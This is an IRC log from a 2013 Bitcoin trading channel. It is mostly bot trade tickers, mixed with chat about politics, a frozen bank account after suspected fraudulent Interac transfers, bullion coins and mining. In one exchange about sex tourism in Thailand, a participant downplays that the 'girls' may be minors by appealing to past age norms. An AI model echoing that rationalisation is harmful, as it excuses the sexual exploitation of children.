[BTCTC] [LABCOIN] 130 @ 0.003117 = 0.4052 BTC [+] Sep 12 22:03:04 MUTT IS THE POINT Sep 12 22:03:04 fetchmail just fetches your mail spool from a server Sep 12 22:03:05 [BTCTC] [LABCOIN] 1682 @ 0.003127 = 5.2596 BTC [+] Sep 12 22:03:08 and makes one locally Sep 12 22:03:13 its not an actual client Sep 12 22:03:15 pine is a thing of beauty. i threw out a CRT once with a pine menu burned in... Sep 12 22:03:18 [BTCTC] [LABCOIN] 72 @ 0.003127 = 0.2251 BTC [+] Sep 12 22:03:26 asciilifeform: pitty Sep 12 22:03:28 HEH Sep 12 22:03:35 [BTCTC] [LABCOIN] 436 @ 0.003126 = 1.3629 BTC [-] Sep 12 22:03:37 [BTCTC] [LABCOIN] 16 @ 0.003129 = 0.0501 BTC [+] Sep 12 22:03:38 [BTCTC] [LABCOIN] 95 @ 0.003154 = 0.2996 BTC [+] Sep 12 22:03:39 [BTCTC] [LABCOIN] 140 @ 0.003177 = 0.4448 BTC [+] Sep 12 22:03:40 [BTCTC] [LABCOIN] 99 @ 0.003178 = 0.3146 BTC [+] Sep 12 22:03:41 [BTCTC] [LABCOIN] 1000 @ 0.003199 = 3.199 BTC [+] Sep 12 22:03:42 [BTCTC] [LABCOIN] 30 @ 0.003199 = 0.096 BTC [+] Sep 12 22:03:44 [BTCTC] [LABCOIN] 3353 @ 0.0032 = 10.7296 BTC [+] Sep 12 22:03:50 thats an art project. recreate the CRT burn for people Sep 12 22:03:55 [BTCTC] [LABCOIN] 240 @ 0.0032 = 0.768 BTC [+] Sep 12 22:03:58 [BTCTC] [TAT.ASICMINER] 39 @ 0.02148 = 0.8377 BTC [+] Sep 12 22:03:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02148 BTC [+] Sep 12 22:04:22 [BTCTC] [LABCOIN] 363 @ 0.003198 = 1.1609 BTC [-] Sep 12 22:04:37 amazing that we still have flashy screen savers because of it Sep 12 22:04:38 AMAZING COMPANY! Sep 12 22:04:43 [BTCTC] [LABCOIN] 275 @ 0.003198 = 0.8795 BTC [-] Sep 12 22:05:04 [BTCTC] [LABCOIN] 225 @ 0.003198 = 0.7196 BTC [-] Sep 12 22:05:24 [BTCTC] [LABCOIN] 200 @ 0.003198 = 0.6396 BTC [-] Sep 12 22:05:33 [BTCTC] [LABCOIN] 92 @ 0.0032 = 0.2944 BTC [+] Sep 12 22:05:34 [BTCTC] [LABCOIN] 408 @ 0.003249 = 1.3256 BTC [+] Sep 12 22:05:37 [BTCTC] [LABCOIN] 110 @ 0.003198 = 0.3518 BTC [-] Sep 12 22:06:08 http://www.zerohedge.com/news/2013-09-12/assad-lays-down-his-conditions-deal-depends-us-stopping-aid-terrorists Sep 12 22:06:09 asciilifeform i had one of those too. Sep 12 22:06:12 Assad Lays Down His Conditions: "US Must Stop Aiding Terrorists", Israel Disposing Of WMDs; Accuses Sep 12 22:06:33 Rulother__ total humiliation putin handed down the us govt. ima write in a sec./ Sep 12 22:06:48 Yeah I am so glad he did too Sep 12 22:06:58 It was quite amazing to hear actually Sep 12 22:06:59 AMAZING COMPANY! Sep 12 22:07:11 [BTCTC] [ACTIVEMINING] 2 @ 0.003002 = 0.006 BTC [-] Sep 12 22:07:26 [BTCTC] [COGNITIVE] 3 @ 0.2812 = 0.8436 BTC [+] Sep 12 22:07:28 [BTCTC] [COGNITIVE] 1 @ 0.2812 BTC [+] Sep 12 22:07:28 [BTCTC] [COGNITIVE] 2 @ 0.281 = 0.562 BTC [-] Sep 12 22:07:29 [BTCTC] [COGNITIVE] 1 @ 0.28 BTC [-] Sep 12 22:07:44 [BTCTC] [ACTIVEMINING] 2 @ 0.003001 = 0.006 BTC [-] Sep 12 22:07:49 o assbot Sep 12 22:08:01 bah, so i guess that means war Sep 12 22:08:05 (21:07:31) assbot: [MPEx] [LOCKHEEDMARTIN] 408 @ 120.003249 = 1000.3256 BTC [+] Sep 12 22:08:21 [BTCTC] [ACTIVEMINING] 95 @ 0.003002 = 0.2852 BTC [+] Sep 12 22:08:23 It's about time people truly start standing up to the US Sep 12 22:08:36 [BTCTC] [DMS.MINING] 1 @ 0.002689 BTC [+] Sep 12 22:08:39 Putin is just food. Sep 12 22:08:46 I want this president to get impeached so bad Sep 12 22:08:58 LOLOLOL Sep 12 22:09:39 because socialism? Sep 12 22:09:43 [BTCTC] [LABCOIN] 5 @ 0.003246 = 0.0162 BTC [+] Sep 12 22:09:44 lol Duffer Sep 12 22:09:45 No Sep 12 22:09:51 He has gone against everything he has said Sep 12 22:09:58 [BTCTC] [LABCOIN] 40 @ 0.003246 = 0.1298 BTC [+] Sep 12 22:10:00 He has taken Bush policies to a new level Sep 12 22:10:16 Are you really that niave? Sep 12 22:10:17 ah, ok that's fair, i thought you were going to go all kenyan muslim on me there Sep 12 22:10:23 No Sep 12 22:10:25 haha Sep 12 22:10:33 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0006338 = 0.0013 BTC [+] Sep 12 22:10:34 [BTCTC] [LABCOIN] 44 @ 0.003246 = 0.1428 BTC [+] Sep 12 22:10:39 I voted Garry Johnson honestly Sep 12 22:11:08 [BTCTC] [LABCOIN] 21 @ 0.003246 = 0.0682 BTC [+] Sep 12 22:11:09 [BTCTC] [LABCOIN] 8 @ 0.003247 = 0.026 BTC [+] Sep 12 22:11:10 [BTCTC] [LABCOIN] 121 @ 0.003249 = 0.3931 BTC [+] Sep 12 22:13:17 I vote Anonymous 2016 Sep 12 22:13:37 I'll democrate if they pick Elizabeth Warren Sep 12 22:13:38 samson_ San1ty_ saulimus sbjf_ Scrat sgnb smickles smidge SpNg Stardust Sep 12 22:13:39 that or Lawrence Lessig and Yorkai Benkler Sep 12 22:13:41 gesell pretty muhc. Sep 12 22:13:42 the hell with Hilary Sep 12 22:14:04 would you pick hillary over cruz? Sep 12 22:14:04 the DNC got stuck in 1984 so she can forget 2016 Sep 12 22:14:33 Doesn't really matter in the end, the whole system is rigged Sep 12 22:15:14 [BTCTC] [DMS.MINING] 4 @ 0.002689 = 0.0108 BTC [+] Sep 12 22:15:17 i hate that excuse, and i hate that it's probably right Sep 12 22:15:24 every time you think of U.S. politicos, the alien slug attached to the back of your head goes 'mmm, yum.' Sep 12 22:15:53 I'll still vote third party, but I know it doesn't matter. Sep 12 22:15:59 we should fund a anon2016 campaign. with 3 mandates: Sep 12 22:15:59 1. defund NSA and stop warrantless surveillance Sep 12 22:15:59 2. institute public funding for ellections to end monopoly of money in politics Sep 12 22:15:59 3. impeach ourselves Sep 12 22:16:03 I'm all for a revolution within Sep 12 22:16:20 [BTCTC] [ASICMINER-PT] 5 @ 2.22 = 11.1 BTC [+] Sep 12 22:16:29 as soon as items #1 and #2 are completed #3 takes places Sep 12 22:16:30 [HAVELOCK] [VTX] 1 @ 0.59999 BTC [+] Sep 12 22:16:37 so the sooner they are done the sooner anon is out of power Sep 12 22:16:42 [HAVELOCK] [SDSTM] 4 @ 0.0028 = 0.0112 BTC [+] Sep 12 22:17:06 by 2015 anon community elects two representitives to run (did I mention Lessign and Benkler?) Sep 12 22:17:06 we should annex mexico and convert to bitcoin Sep 12 22:17:26 s/Lessign/Lessig Sep 12 22:17:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0006338 BTC [+] Sep 12 22:17:46 [BTCTC] [ASICMINER-PT] 13 @ 2.22 = 28.86 BTC [+] Sep 12 22:18:19 if the platform is asked about their opinion on gay rights "thats not our mandate" or gun rights "not our mandate" or drug laws "not our mandate" etc Sep 12 22:18:31 they fix two problems and leave Sep 12 22:18:42 aaaanyway Sep 12 22:18:45 back to assbot Sep 12 22:19:05 gay rights, gun rights and drug rights :P Sep 12 22:19:09 [BTCTC] [ACTIVEMINING] 1 @ 0.003 BTC [-] Sep 12 22:19:11 [BTCTC] [ACTIVEMINING] 1 @ 0.003 BTC [-] Sep 12 22:19:12 [BTCTC] [ACTIVEMINING] 53 @ 0.002931 = 0.1553 BTC [-] Sep 12 22:19:38 interesting the dominence of one of those solves the problem of the other two, take your pick Sep 12 22:19:49 [BTCTC] [LABCOIN] 6 @ 0.003247 = 0.0195 BTC [-] Sep 12 22:19:50 i mean the dominence of any one of them Sep 12 22:20:42 [BTCTC] [LABCOIN] 1 @ 0.003247 BTC [-] Sep 12 22:20:44 [BTCTC] [LABCOIN] 49 @ 0.003248 = 0.1592 BTC [+] Sep 12 22:27:08 could assbot intigrate with open investment places like justdice? Sep 12 22:27:20 or is that not the point and rather the focus on exchanges, not what is exchanged Sep 12 22:27:39 [MPEX] [S.MPOE] 7450 @ 0.00089661 = 6.6797 BTC [+] Sep 12 22:27:47 though i guess ther is no share price Sep 12 22:28:29 [MPEX] [S.MPOE] 1700 @ 0.00089661 = 1.5242 BTC [+] Sep 12 22:28:30 [MPEX] [S.MPOE] 1500 @ 0.00089675 = 1.3451 BTC [+] Sep 12 22:31:02 [HAVELOCK] [XBOND] 23 @ 0.0011747 = 0.027 BTC [+] Sep 12 22:34:31 [HAVELOCK] [XBOND] 454 @ 0.0011747 = 0.5333 BTC [+] Sep 12 22:37:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.0215 = 0.043 BTC [+] Sep 12 22:43:55 [MPEX] [S.MPOE] 3000 @ 0.00089612 = 2.6884 BTC [-] Sep 12 22:44:11 http://trilema.com/2013/sudetenland-or-kwestia-polska/ Sep 12 22:44:14 Sudetenland ? Or Kwestia Polska ? pe Trilema - Un blog de Mircea Popescu. Sep 12 22:45:10 [BTCTC] [MININGCO.ETF] 1 @ 0.07124 BTC [-] Sep 12 22:45:46 but billy mays is dead D: Sep 12 22:46:05 [HAVELOCK] [AM100] 1 @ 0.02145 BTC [+] Sep 12 22:50:04 [HAVELOCK] [CBTC] 5000 @ 0.00044 = 2.2 BTC [-] Sep 12 22:50:22 [BTCTC] [DMS.MINING] 35 @ 0.002689 = 0.0941 BTC [+] Sep 12 22:50:53 [HAVELOCK] [CBTC] 1 @ 0.00045 BTC [+] Sep 12 22:51:14 [HAVELOCK] [CBTC] 10 @ 0.00045 = 0.0045 BTC [+] Sep 12 22:51:25 [HAVELOCK] [CBTC] 1 @ 0.00045 BTC [+] Sep 12 22:52:22 zuckerberg says US did a bad job of scrutinising NSA tradeoffs on privacy... this from the person that changes their privacy policy indiscriminately and some would say is responsible for the desensitisation of the public to privacy. Sep 12 22:53:05 [BTCTC] [BASIC-MINING] 2 @ 0.135 = 0.27 BTC [-] Sep 12 22:53:50 nubbins` tis true. Sep 12 22:54:05 gesell funny how that works huh. Sep 12 22:54:26 Well apparently I'll be hot water for a while. Will have to jump hoops. If you use localbitcoins, do cash in hand transactions only. Sep 12 22:54:34 [HAVELOCK] [CBTC] 811 @ 0.00045 = 0.365 BTC [+] Sep 12 22:54:37 [BTCTC] [LABCOIN] 100 @ 0.003247 = 0.3247 BTC [-] Sep 12 22:54:46 Namworld: why what happened? Sep 12 22:56:32 I put an online sell ad for transfer (Interac E-mail transfer). Got one for 300 bucks, it went through. Got another for ~600, got declined. And got like 3-4 more within minutes for also ~600 from different accounts all sent to my email. Didn't try to cash those. Sep 12 22:56:38 I was pretty much "uh oh" Sep 12 22:57:20 My debit card has been suspended since and I keep having to do transaction in person with two proof of identity with photos cause they're investigating my account. Sep 12 22:57:50 Now after over a month I'm asked if I have an account at X other bank and I'm told I have to call them anyway. Sep 12 22:58:06 ouch man Sep 12 22:58:42 what country is that namworld? Sep 12 22:58:45 Namworld: can you explain more about that or have you somewhere else? Sep 12 22:58:51 the debt and account issues Sep 12 22:58:52 I hope the 300 was legit. and just the 600s I got later that evening are ok. Sep 12 22:59:04 Cause the only BTC I released from escrow is for the 300. Sep 12 22:59:20 And that only the 6xx attempts are an issue. Sep 12 22:59:45 It's Canada. Sep 12 23:00:12 You can send from your bank account funds to an email address from most banks here. Sep 12 23:00:16 ah.. never heard of that interac email thingy.. but good to know.. and indeed sucks.. Sep 12 23:00:48 It's kinda like an ATM withdrawal. It's instant deposit to the other account when the user receives and deposit from his email. Sep 12 23:01:02 interac e-transfer is great Sep 12 23:01:03 okay, isn't that kinda unsafe? Sep 12 23:01:12 you click the link in your email Sep 12 23:01:18 it brings you to your bank's login page Sep 12 23:01:33 you log in, and you're asked which account the money will be deposited to Sep 12 23:01:51 there's also a "security question" you have to answer, chosen by the sender Sep 12 23:01:58 and sending is done from internet banking as well? Sep 12 23:02:02 yes Sep 12 23:02:03 ahh okay thats good... Sep 12 23:02:19 so basically the senders account were prolly hacked and now u pay the price? Sep 12 23:02:19 the email is essentially just a link to a transaction id Sep 12 23:02:40 apparently that's what happening in Europe as well with sepa transfers.. Sep 12 23:02:42 Yeah... well at worse 300 which is the only one I've been able to deposit and released escrow. Sep 12 23:02:51 [BTCTC] [DMS.SELLING] 3 @ 0.009507 = 0.0285 BTC [+] Sep 12 23:03:09 yeah but the whole investigation and blocked cards suck bigtime.. Sep 12 23:03:16 Really, I think the issues are worse than the 300 yeah Sep 12 23:03:17 now you are the "villain" Sep 12 23:03:20 Namworld: so why did they close or put a hold on your account? because you had a lot of transactions? I'm just wondering if for some reason i also have a lot of transactions if they would do this Sep 12 23:03:30 [BTCTC] [DMS.PURCHASE] 3 @ 0.01195 = 0.0359 BTC [-] Sep 12 23:04:08 it's because if they don't do that the criminals will start sending the money to some bum on the street with a bank account... Sep 12 23:04:28 pretty much. Sep 12 23:04:29 No, probably because the account owners of those email transfers reported it as theft. Sep 12 23:04:43 And they now investigate the whole thing and whatever. Sep 12 23:04:55 gotchya Sep 12 23:05:05 [BTCTC] [LABCOIN] 460 @ 0.003245 = 1.4927 BTC [-] Sep 12 23:05:06 Not the amount of transactions which is a problem. That's my guess. Sep 12 23:05:26 the transactions are prolly flagged as fraudulent.. Sep 12 23:05:29 [BTCTC] [DMS.MINING] 3 @ 0.002595 = 0.0078 BTC [-] Sep 12 23:05:39 which makes your bank account flagged Sep 12 23:06:01 [BTCTC] [LABCOIN] 1 @ 0.003244 BTC [-] Sep 12 23:06:58 [MPEX] [S.MPOE] 3500 @ 0.00089675 = 3.1386 BTC [+] Sep 12 23:06:59 [MPEX] [S.MPOE] 8470 @ 0.00089737 = 7.6007 BTC [+] Sep 12 23:07:04 [MPEX] [S.MPOE] 758 @ 0.00089754 = 0.6803 BTC [+] Sep 12 23:07:25 gotchya Sep 12 23:07:35 yeah that makes sense. just wondered if it was because of normal activity Sep 12 23:07:38 but its not Sep 12 23:08:04 [MPEX] [S.MPOE] 7792 @ 0.00089754 = 6.9936 BTC [+] Sep 12 23:08:06 Cash transactions are usually nice. No problem there. Sep 12 23:08:13 [MPEX] [S.MPOE] 5700 @ 0.00089768 = 5.1168 BTC [+] Sep 12 23:08:14 [MPEX] [S.MPOE] 344 @ 0.00089777 = 0.3088 BTC [+] Sep 12 23:08:36 Dealing with banks is a big risk tho. And a PITA. Sep 12 23:08:58 well what really sucks is if next time you "fail" to do due diligence (like checking identification and stuff) they can just get the money back from you.. cuz "you should have known" ... Sep 12 23:09:03 yeah i just have been discussing a $50k transfer and sale and not sure whats going to happen with that Sep 12 23:09:15 (banks were involved so) Sep 12 23:10:02 what's it down to now Sep 12 23:10:06 was like 21 yesterday iirc Sep 12 23:10:25 it was higher then Sep 12 23:10:32 fuzzy memory Sep 12 23:14:21 chaang-noi: CRYPTO KING OF THAILAND Sep 12 23:15:47 i was thinking of visiting thailand to get laid Sep 12 23:15:56 i heard the girls there no how to make a man happy Sep 12 23:15:58 is dis tru? Sep 12 23:16:06 the ~girls~ Sep 12 23:16:22 "girls" Sep 12 23:16:38 [BTCTC] [LABCOIN] 1 @ 0.00313 BTC [-] Sep 12 23:16:40 [BTCTC] [LABCOIN] 5 @ 0.003129 = 0.0156 BTC [-] Sep 12 23:16:41 [BTCTC] [LABCOIN] 6 @ 0.003113 = 0.0187 BTC [-] Sep 12 23:16:42 [BTCTC] [LABCOIN] 61 @ 0.003112 = 0.1898 BTC [-] Sep 12 23:16:43 [BTCTC] [LABCOIN] 49 @ 0.003106 = 0.1522 BTC [-] Sep 12 23:16:44 [BTCTC] [LABCOIN] 556 @ 0.003105 = 1.7264 BTC [-] Sep 12 23:16:46 [BTCTC] [LABCOIN] 6 @ 0.003103 = 0.0186 BTC [-] Sep 12 23:16:47 [BTCTC] [LABCOIN] 280 @ 0.003102 = 0.8686 BTC [-] Sep 12 23:16:48 [BTCTC] [LABCOIN] 219 @ 0.003102 = 0.6793 BTC [-] Sep 12 23:16:48 [BTCTC] [LABCOIN] 800 @ 0.003101 = 2.4808 BTC [-] Sep 12 23:16:49 [BTCTC] [LABCOIN] 287 @ 0.003101 = 0.89 BTC [-] Sep 12 23:16:50 [BTCTC] [LABCOIN] 1 @ 0.003099 BTC [-] Sep 12 23:16:51 [BTCTC] [LABCOIN] 120 @ 0.003099 = 0.3719 BTC [-] Sep 12 23:16:53 news? Sep 12 23:17:16 Thai wife, would you recommend, not recommend? Sep 12 23:17:28 nop gesell just another thursday at labcoin Sep 12 23:17:43 Namworld's troubles support the argument for firewalling one's paper fiat finances away from the BTC world Sep 12 23:19:13 btc <-> metals, ok; BTC <-> physical cash; ok; btc <-> electronic fiat: gasenwagen... Sep 12 23:20:01 http://www.mint.ca/store/coin/20-for-20-fine-silver-coin-iceberg-and-whale-2013-prod1690016 Sep 12 23:20:06 $20 for $20 Fine Silver Coin - Iceberg and Whale (2013) Sep 12 23:20:07 i picked up some of these the other day Sep 12 23:20:19 [BTCTC] [LABCOIN] 8 @ 0.003236 = 0.0259 BTC [+] Sep 12 23:20:24 only 1/4oz silver, but sold for face value Sep 12 23:20:25 can't lose Sep 12 23:20:45 asciilifeform at this rate we'll end up with gasenwagen, the musical. Sep 12 23:20:53 dont think i can firewall paper and btc Sep 12 23:20:54 yes, they're legal tender Sep 12 23:21:07 i mean paper yeah, easy. but btc is too much volume in my life at the moment so hard to to use a bank Sep 12 23:21:18 heheh Sep 12 23:21:20 i bought 3 Sep 12 23:21:29 it's a series, they always have different ones available Sep 12 23:22:07 [BTCTC] [DMS.MINING] 1 @ 0.002595 BTC [-] Sep 12 23:22:10 i'm not a very big fan of the "coloured coins" the mint is issuing lately, though Sep 12 23:22:13 http://www.mint.ca/store/coin/the-eastern-prickly-pear-cactus-coloured-coin-2013-prod1700008?o_action=crossSell#.UjIiUGQiFnQ Sep 12 23:22:17 The Eastern Prickly Pear Cactus - Coloured Coin (2013) Sep 12 23:22:22 i mean, it's cool that they can do it Sep 12 23:22:25 but it looks shitty Sep 12 23:22:51 nah these are randoms Sep 12 23:23:02 [BTCTC] [DMS.MINING] 1 @ 0.002693 BTC [+] Sep 12 23:23:07 $20 for $20 is here: http://www.mint.ca/store/buy/20-for-20_coins-cat610001 Sep 12 23:23:27 [BTCTC] [ACTIVEMINING] 10 @ 0.003099 = 0.031 BTC [+] Sep 12 23:23:29 [BTCTC] [ACTIVEMINING] 90 @ 0.0031 = 0.279 BTC [+] Sep 12 23:23:52 heh yeah Sep 12 23:24:10 all the mint's silver is 99.99% pure, too Sep 12 23:24:13 instead of just 99.9% Sep 12 23:24:23 those are selling 10% below spot? Sep 12 23:24:30 kakobrekla: 0.25oz Sep 12 23:24:40 a Sep 12 23:24:44 yeah Sep 12 23:24:57 so essentially, you can trade your lame $20 bills for cool $20 silver coins Sep 12 23:25:33 [BTCTC] [DMS.MINING] 4 @ 0.002692 = 0.0108 BTC [-] Sep 12 23:25:34 [BTCTC] [DMS.MINING] 1 @ 0.002693 BTC [+] Sep 12 23:26:45 it was reasonable within canada Sep 12 23:26:50 no tax either, obv Sep 12 23:26:54 [BTCTC] [NASTY-PT] 11 @ 0.001949 = 0.0214 BTC [+] Sep 12 23:27:26 [BTCTC] [DMS.MINING] 1 @ 0.002693 BTC [+] Sep 12 23:27:39 By today's western standard, the girls are "girls". A few centuries ago tho, they'd be of age already according to western standards. Sep 12 23:28:12 heh me too Sep 12 23:28:42 I thought you guys were talking about some being literal girls instead of women. Sep 12 23:29:07 [HAVELOCK] [XBOND] 2 @ 0.0011747 = 0.0023 BTC [+] Sep 12 23:29:27 i assumed ladyboys Sep 12 23:31:23 [BTCTC] [ACTIVEMINING] 10 @ 0.003119 = 0.0312 BTC [+] Sep 12 23:31:24 [BTCTC] [ACTIVEMINING] 60 @ 0.00312 = 0.1872 BTC [+] Sep 12 23:31:24 [BTCTC] [ACTIVEMINING] 100 @ 0.00314 = 0.314 BTC [+] Sep 12 23:31:26 [BTCTC] [ACTIVEMINING] 310 @ 0.003208 = 0.9945 BTC [+] Sep 12 23:31:27 [BTCTC] [ACTIVEMINING] 28 @ 0.00321 = 0.0899 BTC [+] Sep 12 23:31:28 [BTCTC] [ACTIVEMINING] 4070 @ 0.00329 = 13.3903 BTC [+] Sep 12 23:31:55 [HAVELOCK] [CBTC] 1180 @ 0.00043 = 0.5074 BTC [-] Sep 12 23:32:08 [HAVELOCK] [CBTC] 2600 @ 0.00042 = 1.092 BTC [-] Sep 12 23:32:34 [HAVELOCK] [CBTC] 2400 @ 0.0004 = 0.96 BTC [-] Sep 12 23:33:04 $13 for 3? Sep 12 23:33:30 puts your $20 coin at $24.25 Sep 12 23:33:36 [BTCTC] [ASICMINER-PT] 1 @ 2.22 BTC [+] Sep 12 23:33:59 [MPEX] [S.MPOE] 2950 @ 0.00089777 = 2.6484 BTC [+] Sep 12 23:34:08 well, it's the highest silver content available, from a world-renowned mint Sep 12 23:34:17 [BTCTC] [ACTIVEMINING] 310 @ 0.003288 = 1.0193 BTC [-] Sep 12 23:34:29 no guarantees that they'll be worth more than $20 in the future, but it seems like a reasonably safe bet Sep 12 23:34:39 not like we're talking ounces of gold here Sep 12 23:34:46 six nines?! Sep 12 23:35:31 heh Sep 12 23:35:51 damn chaang is it just silver or do you go for gold/plat? Sep 12 23:35:58 APMEX | 100 oz Royal Canadian Mint RCM .9999 Fine Silver Bar | APMEX.com Sep 12 23:35:59 heh phew Sep 12 23:36:04 four nines is standard Sep 12 23:36:07 for the mint here Sep 12 23:36:45 would be fun to buy gold in bars and melt it down for diy coinage Sep 12 23:37:03 o.0 Sep 12 23:37:12 hand-poured looks so nice Sep 12 23:37:34 exactly Sep 12 23:37:45 nobody wants to buy a coin that you melted yourself Sep 12 23:38:23 i like the idea of fractional gold coins Sep 12 23:38:25 1/10oz etc Sep 12 23:38:30 [BTCTC] [LABCOIN] 180 @ 0.003206 = 0.5771 BTC [-] Sep 12 23:38:31 [BTCTC] [LABCOIN] 280 @ 0.003208 = 0.8982 BTC [+] Sep 12 23:38:32 [BTCTC] [LABCOIN] 5 @ 0.003209 = 0.016 BTC [+] Sep 12 23:38:33 [BTCTC] [LABCOIN] 280 @ 0.003243 = 0.908 BTC [+] Sep 12 23:38:34 [BTCTC] [LABCOIN] 385 @ 0.003244 = 1.2489 BTC [+] Sep 12 23:38:35 [BTCTC] [LABCOIN] 5020 @ 0.003245 = 16.2899 BTC [+] Sep 12 23:38:50 gold toothpicks? hehe Sep 12 23:39:07 silver fractionals are usually at such a high premium, but gold doesn't seem so bad Sep 12 23:39:13 0.5 g Pure Gold Coin - Rocky Mountain Bighorn Sheep - Mintage: 10000 (2014) Sep 12 23:39:39 i'm looking at 1/10oz gold maple leafs: $1575 for ten, vs $1370 spot Sep 12 23:40:10 chaang-noi: i was in the canadian rockies last month, saw a ton of bighorn sheep Sep 12 23:40:14 [BTCTC] [LABCOIN] 2 @ 0.003242 = 0.0065 BTC [-] Sep 12 23:40:20 yeah Sep 12 23:40:29 i've got no gold, and 1oz coins are such a large chunk Sep 12 23:40:49 [BTCTC] [ACTIVEMINING] 330 @ 0.003034 = 1.0012 BTC [-] Sep 12 23:41:13 [BTCTC] [ACTIVEMINING] 45 @ 0.003034 = 0.1365 BTC [-] Sep 12 23:41:39 that 0.5g coin is TINY Sep 12 23:42:09 that's almost half the size of a dime Sep 12 23:42:13 dimes are 18mm Sep 12 23:43:33 chaang are you a day trader then? Sep 12 23:43:40 http://www.mint.ca/store/coin/pure-gold-1-kilogram-coin-the-caribou-mintage-20-2013-prod1690002 Sep 12 23:43:43 Pure Gold 1 Kilogram Coin - The Caribou - Mintage: 20 (2013) Sep 12 23:43:43 $69,000 coin Sep 12 23:45:03 lol 1 kilo how big is that coin? Sep 12 23:45:44 o.0 now that's just showing off Sep 12 23:46:08 useful for flipping Sep 12 23:46:21 note that the mintage was only 20 Sep 12 23:46:49 ha Sep 12 23:47:00 you could crush someone to death with that Sep 12 23:48:38 a lot :/ Sep 12 23:48:42 http://bitbet.us/bet/508/btc-network-difficulty-to-top-500mn-before-xmas/ Sep 12 23:48:45 http://bitbet.us/bet/117/network-difficulty-above-90m-in-2013/ Sep 12 23:48:47 http://bitbet.us/bet/518/btc-network-diff-to-top-210m-before-november/ Sep 12 23:48:48 BitBet - BTC network difficulty to top 500MN before Xmas 2013 Sep 12 23:48:50 http://www.mint.ca/store/coin/fine-silver-1-kilogram-coin-maple-leaf-forever-mintage-600-2013-prod1680018#.UjIop2QiFnQ Sep 12 23:48:51 http://bitbet.us/bet/519/btc-network-difficulty-to-top-1b-before-2014/ Sep 12 23:48:52 BitBet - Network Difficulty above 90M in 2013 Sep 12 23:48:55 BitBet - BTC network diff to top 210M before November Sep 12 23:48:57 there is your answer Sep 12 23:48:57 BitBet - BTC network difficulty to top 1B before 2014 Sep 12 23:48:59 Fine Silver 1 kilogram Coin - Maple Leaf Forever - Mintage: 600 (2013) Sep 12 23:49:07 1kg silver coin with gold plating Sep 12 23:49:13 now that's rich looking Sep 12 23:50:03 wat Sep 12 23:50:12 oo i like that Sep 12 23:50:12 [BTCTC] [DMS.MINING] 36 @ 0.002693 = 0.0969 BTC [+] Sep 12 23:50:19 [BTCTC] [DMS.MINING] 3 @ 0.002694 = 0.0081 BTC [+] Sep 12 23:50:53 dont Sep 12 23:51:00 no need to thank me Sep 12 23:51:42 probably january Sep 12 23:51:45 [BTCTC] [TAT.MINIGAME] 1 @ 0.000249 BTC [-] Sep 12 23:52:21 i dunno, isn't mining for suckers these days? Sep 12 23:52:42 not at the hashrate chaang is talking about Sep 12 23:53:10 cointerra goldstrikes chaang? Sep 12 23:53:50 because ;;nethash Sep 12 23:53:56 ;;nethash Sep 12 23:53:56 893431.366997 Sep 12 23:54:16 wait where'd 2mil come from? Sep 12 23:54:57 ah a whales only group buy? :P Sep 12 23:55:52 [BTCTC] [LABCOIN] 132 @ 0.003238 = 0.4274 BTC [-] Sep 12 23:55:54 [BTCTC] [LABCOIN] 368 @ 0.00324 = 1.1923 BTC [+] Sep 12 23:56:17 are we talking about peta-mine? Sep 12 23:57:18 ah nm, sketchy ipo that should be a pmb, plans to use cointerra chips Sep 12 23:57:37 how did the avalon deal go chaang-noi :) Sep 12 23:57:59 lel @ PMBs Sep 12 23:58:25 [BTCTC] [LABCOIN] 61 @ 0.003237 = 0.1975 BTC [-] Sep 12 23:58:26 [BTCTC] [LABCOIN] 155 @ 0.003238 = 0.5019 BTC [+] Sep 12 23:58:27 [BTCTC] [LABCOIN] 484 @ 0.00324 = 1.5682 BTC [+] Sep 12 23:59:33 sheesh Sep 12 23:59:43 i should have quoted you 2x price for those certs ;) Sep 13 00:00:14 ;;estimate Sep 13 00:00:15 Next difficulty estimate | 108587140.61 based on data since last change | 124809015.679 based on data for last three days Sep 13 00:00:19 ! Sep 13 00:00:29 yeah, i'm just joking Sep 13 00:01:29 [MPEX] [S.MPOE] 7606 @ 0.00089777 = 6.8284 BTC [+] Sep 13 00:01:30 [MPEX] [S.MPOE] 477 @ 0.00089849 = 0.4286 BTC [+] Sep 13 00:01:47 [MPEX] [S.MPOE] 4217 @ 0.00089938 = 3.7927 BTC [+] Sep 13 00:02:28 chaang that chart doesn't include VMC or Labcoin equipment Sep 13 00:02:37 [BTCTC] [LABCOIN] 80 @ 0.00324 = 0.2592 BTC [+] Sep 13 00:02:41 they're major wildcards **** BEGIN LOGGING AT Fri Sep 13 04:11:39 2013 Sep 13 04:11:39 [BTCTC] [LABCOIN] 9 @ 0.003129 = 0.0282 BTC [-] Sep 13 04:11:40 [BTCTC] [LABCOIN] 99 @ 0.003128 = 0.3097 BTC [-] Sep 13 04:11:41 [BTCTC] [LABCOIN] 6 @ 0.003104 = 0.0186 BTC [-] Sep 13 04:11:42 [BTCTC] [LABCOIN] 96 @ 0.003103 = 0.2979 BTC [-] Sep 13 04:11:42 [BTCTC] [LABCOIN] 60 @ 0.003103 = 0.1862 BTC [-] Sep 13 04:11:44 [BTCTC] [LABCOIN] 448 @ 0.003103 = 1.3901 BTC [-] Sep 13 04:11:46 thestringpuller what is that ? Sep 13 04:12:12 o aehtero. meyah. Sep 13 04:13:40 [HAVELOCK] [AM100] 9 @ 0.0202 = 0.1818 BTC [-] Sep 13 04:17:24 [BTCTC] [ACTIVEMINING] 266 @ 0.003028 = 0.8054 BTC [-] Sep 13 04:17:26 [BTCTC] [ACTIVEMINING] 66 @ 0.003025 = 0.1997 BTC [-] Sep 13 04:17:27 [BTCTC] [ACTIVEMINING] 25 @ 0.00302 = 0.0755 BTC [-] Sep 13 04:17:28 [BTCTC] [ACTIVEMINING] 6 @ 0.003005 = 0.018 BTC [-] Sep 13 04:17:29 [BTCTC] [ACTIVEMINING] 25 @ 0.003004 = 0.0751 BTC [-] Sep 13 04:17:35 [MPEX] [S.MPOE] 2550 @ 0.00089878 = 2.2919 BTC [+] Sep 13 04:17:57 [BTCTC] [ACTIVEMINING] 66 @ 0.003003 = 0.1982 BTC [-] Sep 13 04:17:58 [BTCTC] [ACTIVEMINING] 100 @ 0.003004 = 0.3004 BTC [+] Sep 13 04:18:33 [BTCTC] [ACTIVEMINING] 100 @ 0.003031 = 0.3031 BTC [+] Sep 13 04:20:03 [BTCTC] [ACTIVEMINING] 190 @ 0.003009 = 0.5717 